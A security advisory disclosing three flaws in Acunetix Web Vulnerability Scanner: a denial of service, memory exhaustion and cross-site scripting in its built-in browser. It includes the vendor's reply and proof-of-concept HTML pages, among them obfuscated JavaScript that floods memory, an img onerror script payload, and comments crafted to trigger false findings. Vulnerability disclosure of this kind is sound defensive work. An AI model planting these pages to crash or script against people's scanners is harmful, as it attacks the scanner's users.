SSD Advisory – Acunetix WVS XSS, Memory Exhaustion and DoS

Vulnerability Description
Three security vulnerabilities have been discovered in Acunetix WVS, these vulnerabilities allow a site owner that knows that his site will scanned by Acunetix (with permission or without) to target the user of the Acunetix and to cause the product to crash, exhaust memory of the scanner or to trigger a cross site scripting attack against the user during the configuration step and during the user’s reading of the final report.
All these vulnerabilities do not pose a harm greater than being an annoyance, beside the XSS which could be leveraged to preform cause more harm if it is combined with some social engineering aspects.

Vulnerable Versions
Acunetix Web Vulnerability Scanner v10.0 Build 20150623
Acunetix Web Vulnerability Scanner v9.5 Build 20140602
Acunetix Web Vulnerability Scanner v8.0 Build 20120704
Acunetix Web Vulnerability Scanner v6.0 Build 20081124
Vendor Response
The vendor has stated the following:

To start off, WVS is designed in a way to detect vulnerabilities on a website that you own. We have in fact disabled certain security features to allow the alerts that have been developed in your HTML files. Also, XSS is when someone injects a script in the website, not when a script that displays an alert is embedded in the site.

And added:

The Acunetix EULA specifically disallows scanning sites without permission from the owner of the site. This invalidates the vulnerabilities that you have reported, since the product is not used as intended. Our integrated browser is actually designed to show the XSS errors that are found on the site, so as to better illustrate the vulnerability detected.
In addition, your researcher seems to be using an illegal copy of our product. Ask him to regularise his position.

We do agree that Acunetix WVS should be used with permission of the target device, we however disagree that the product should allow an attack against the person preforming the scan.
Acunetix WVS Denial Of Service Vulnerability
The Denial of Service (DoS) attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed. Acunetix WVS is vulnerable to Denial of Service attacks when user performs some actions in the application.
acunetix_image_9
Level of Risk
Medium
Proof of Concept

<html><head>
<style type="text/css">
#a {
margin:0 10px 10px;
}
#b {
width:100%;
}
</style>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>

Acunetix WVS Login Sequencer Memory Exhaustion Vulnerability
The software does not properly restrict the size or amount of memory that are requested or influenced by the application, which can be used to consume more resources than intended. Acunetix WVS is vulnerable to Memory Exhaustion attacks when user performs some actions in application.
acunetix_image_8
Level of Risk
Medium
Proof Of Concept

<html>
	<head>
			<!-- Acunetix False Positive -->
			<!-- [   LOW  ] GHDB: Sablotron error message -->
				<!-- warning "error on line" php sablotron -->
			<!-- [ MEDIUM ] PHPinfo page found -->
				<title>phpinfo()</title>
			<!-- [ MEDIUM ] Source code disclosure -->
				<!-- <?php wsUpPpPp(); ?> -->
			<!-- [  INFO  ] Possible internal IP address disclosure -->
				<!-- 10.0.0.1 -->
			<!-- [  INFO  ] Possible server path disclosure (Unix) -->
				<!-- /var/www/wsUpPpPp.php -->
			<!-- [  INFO  ] Possible server path disclosure (Unix) -->
				<!-- C:\WINDOWS\System32\wsUpPpPp.dll -->
			<!-- [  INFO  ] Possible username or password disclosure -->
				<!-- password: wsUpPpPp -->
			<!-- [  INFO  ] GHDB: phpinfo() -->
				<h1 class="p">PHP Version 5.1.6</h1>
			<!-- [   LOW  ] SQL Statement in comment -->
				<!-- SELECT * FROM wsUpPpPp -->
			<!-- [  INFO  ] Suspicious comment -->
				<!-- needtofix USER password bug -->
			<!-- [ MEDIUM ] Error message on page / Application error message -->
				<b>Warning</b>: fpassthru() expects parameter 1 to be resource, boolean given in <b>/hj/var/www//showimage.php</b> on line <b>6</b><br />
			<!-- [   LOW  ] Session token in URL -->
				<a href="?sessid=07830F56-7776-FFFF-FFFF-535997970533"></a>
			<!-- [   LOW  ] Hidden form input named price was found -->
				<input type='hidden' name='price' value='986'>
			<!-- [ MEDIUM ] Password field submitted using GET method -->
				<form action="" method="get" name="pwnme">
			<!-- [  INFO  ] Password type input with autocomplete enabled -->
                <input type="password" name="password"></form>
		<!-- Memory Exhaustion Proof Of Concept -->
			<script type="text/javascript">
				String.prototype.repeat = function( num )
				{return new Array( num + 1 ).join( this );}
				var i=0;
				var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
				var bib=String.fromCharCode(60, 72, 50, 62, 60, 77, 65, 82, 81, 85,
				69, 69, 32, 87, 73, 68, 84, 72, 61, 49, 48, 48, 37, 32, 66, 69, 72,
				65, 86, 73, 79, 82, 61, 83, 67, 82, 79, 76, 76, 32, 68, 73, 82, 69,
				67, 84, 73, 79, 78, 61, 82, 73, 71, 72, 84, 32, 66, 71, 67, 111, 108,
				111, 114, 61, 121, 101, 108, 108, 111, 119, 62, 60, 105, 110, 112,
				117, 116, 32, 116, 121, 112, 101, 61, 115, 117, 98, 109, 105, 116,
				32, 118, 97, 108, 117, 101, 61)+r+String.fromCharCode(32, 115, 116
				, 121, 108, 101, 61, 34, 98, 97, 99, 107, 103, 114, 111, 117, 110,
				100, 45, 99, 111, 108, 111, 114, 58, 98, 108, 97, 99, 107, 34, 32,
				62, 60, 47, 77, 65, 82, 81, 85, 69, 69, 62, 60, 47, 72, 50, 62);
				document.write(bib.repeat(999999));
			</script>
</head><body></body></html>

Acunetix WVS Cross Site Scripting Vulnerability
A vulnerability in the way Acunetix displays the user the remote site’s HTML rendered page allows malicious site owners to target the Acunetix’s users build-in browser and cause it to execute arbitrary Javascript (not the one that Acunetix injects).
While Acunetix’s good intention of allowing allow visual confirmation of cross site scripting vulnerabilities by allowing the user to see the alert popup, the vulnerability is unexpected as the page displayed and where the Javascript is executed is related to the Error message on page and the Login Sequencer. Both places are not the places you would expect a XSS to take place as these are not the pages that try to inject a XSS attack.
Level of Risk
Low
Proof Of Concept
Steps to reproduce vulnerability in Login Sequencer [lsr.exe] (A):
1. Open Acunetix WVS and then click on ‘New Scan’
2. Click on ‘Scan single website’ and add your domain with XSS and specials payloads to generate few false positives in Acunetix WVS, and click ‘Next’
3. In Options put whatever you want and click ‘Next’
4. In Target click ‘Next’
5. In Login mark ‘Forms Authentication’ and click on ‘New Login Sequence’
acunetix_image_1
6. Cross Site Scripting appear reflected when Login Sequencer is executed
acunetix_image_2
Steps to reproduce vulnerability in Login Sequencer [lsr.exe] (B) (thru LSR file):
1. Open and save this content in a file called ‘xss.lsr’

{
    "actions": [
        {
            "parameters": {
            },
            "target": "http://10.2.4.189/",
            "timeout": 20000,
            "type": "navigate"
        }
    ],
    "detection": {
        "pattern": "",
        "request": "",
        "type": "none"
    },
    "restrictions": [
    ]
}

2. Open Login Secuencer ‘lsr.exe’ and load ‘xss.lsr’ file and click ‘Play’ to reproduce the vulnerability
acunetix_image_3
Steps to reproduce vulnerability in Acunetix WVS [wvs.exe] (A):
XSS is reflected in some frames of advisories, so we need to generate few false positives where the vulnerability will be reflected.
acunetix_image_4
False positives which will trigger XSS on frame
acunetix_image_5
Example of triggered vulnerability clicking on ‘Launch the attack with HTTP Editor’
acunetix_image_6
Example of triggered vulnerability clicking on ‘View HTML response’
acunetix_image_7
Exploit Code

<html><head></head><body>
<!-- Acunetix False Positive -->
<!-- [ LOW ] GHDB: Sablotron error message -->
<!-- warning "error on line" php sablotron -->
<!-- [ MEDIUM ] PHPinfo page found -->
<title>phpinfo()</title>
<!-- [ MEDIUM ] Source code disclosure -->
<!-- <?php wsUpPpPp(); ?> -->
<!-- [ INFO ] Possible internal IP address disclosure -->
<!-- 10.0.0.1 -->
<!-- [ INFO ] Possible server path disclosure (Unix) -->
<!-- /var/www/wsUpPpPp.php -->
<!-- [ INFO ] Possible server path disclosure (Unix) -->
<!-- C:\WINDOWS\System32\wsUpPpPp.dll -->
<!-- [ INFO ] Possible username or password disclosure -->
<!-- password: wsUpPpPp -->
<!-- [ INFO ] GHDB: phpinfo() -->
<h1 class="p">PHP Version 5.1.6</h1>
<!-- [ LOW ] SQL Statement in comment -->
<!-- SELECT * FROM wsUpPpPp -->
<!-- [ INFO ] Suspicious comment -->
<!-- needtofix USER password bug -->
<!-- [ MEDIUM ] Error message on page / Application error message -->
<b>Warning</b>: fpassthru() expects parameter 1 to be resource, boolean given in <b>/hj/var/www//showimage.php</b> on line <b>6</b><br />
<!-- [ LOW ] Session token in URL -->
<a href="?sessid=07830F56-7776-FFFF-FFFF-535997970533"></a>
<!-- [ LOW ] Hidden form input named price was found -->
<input type='hidden' name='price' value='986'>
<!-- [ MEDIUM ] Password field submitted using GET method -->
<form action="" method="get" name="pwnme">
<!-- [ INFO ] Password type input with autocomplete enabled -->
<input type="password" name="password"></form>
<!-- Cross Site Scripting Proof Of Concept -->
<img src=admin onerror="prompt('Cross Site Scripting Attack');">
</body></html>